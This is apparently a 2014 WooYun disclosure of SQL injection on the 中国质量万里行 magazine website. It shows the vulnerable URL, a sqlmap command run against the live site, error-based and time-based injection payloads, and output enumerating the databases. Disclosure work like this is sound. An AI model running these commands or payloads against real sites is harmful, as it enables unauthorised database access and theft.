当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079181

漏洞标题:中国质量万里行官网存SQL注入漏洞

相关厂商:中国质量万里行杂志社

漏洞作者: gently

提交时间:2014-10-13 15:58

修复时间:2014-11-27 16:00

公开时间:2014-11-27 16:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国质量万里行官网存SQL注入漏洞,可得知后台,可扫后台管理员密码

详细说明:

页面地址:
http://www.315online.com/plus/ts_view.php?aid=10
随便输入一个引号:
http://www.315online.com/plus/ts_view.php?aid=10%27
报错了:

MySQL Query : select ts.* from `dede_ts_info` ts where ts.id=10\' 
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 
MySQL Errno : 1064 
Message : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 
Need Help?


上sqlmap:

python sqlmap.py -u 'http://www.315online.com/plus/ts_view.php?aid=111111' --user-agent='Mozilla/5.0' --dbs


顺利列出数据库名称

available databases [3]:
[*] information_schema
[*] phpcms
[*] test


没再继续,人家毕竟是媒体的朋友,点到为止哈,这完全只是个测试

漏洞证明:

GET parameter 'aid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 442 HTTP(s) requests:
---
Place: GET
Parameter: aid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: aid=111111 AND (SELECT 5824 FROM(SELECT COUNT(*),CONCAT(0x7163726171,(SELECT (CASE WHEN (5824=5824) THEN 1 ELSE 0 END)),0x71686c7971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: aid=-9164 OR 7205=SLEEP(5)
---
[13:43:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.19
back-end DBMS: MySQL 5.0
[13:43:03] [INFO] fetching database names
[13:43:03] [INFO] the SQL query used returns 3 entries
[13:43:04] [INFO] retrieved: information_schema
[13:43:04] [INFO] retrieved: phpcms
[13:43:04] [INFO] retrieved: test
available databases [3]:
[*] information_schema
[*] phpcms
[*] test

修复方案:

过滤输入参数

版权声明:转载请注明来源 gently@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝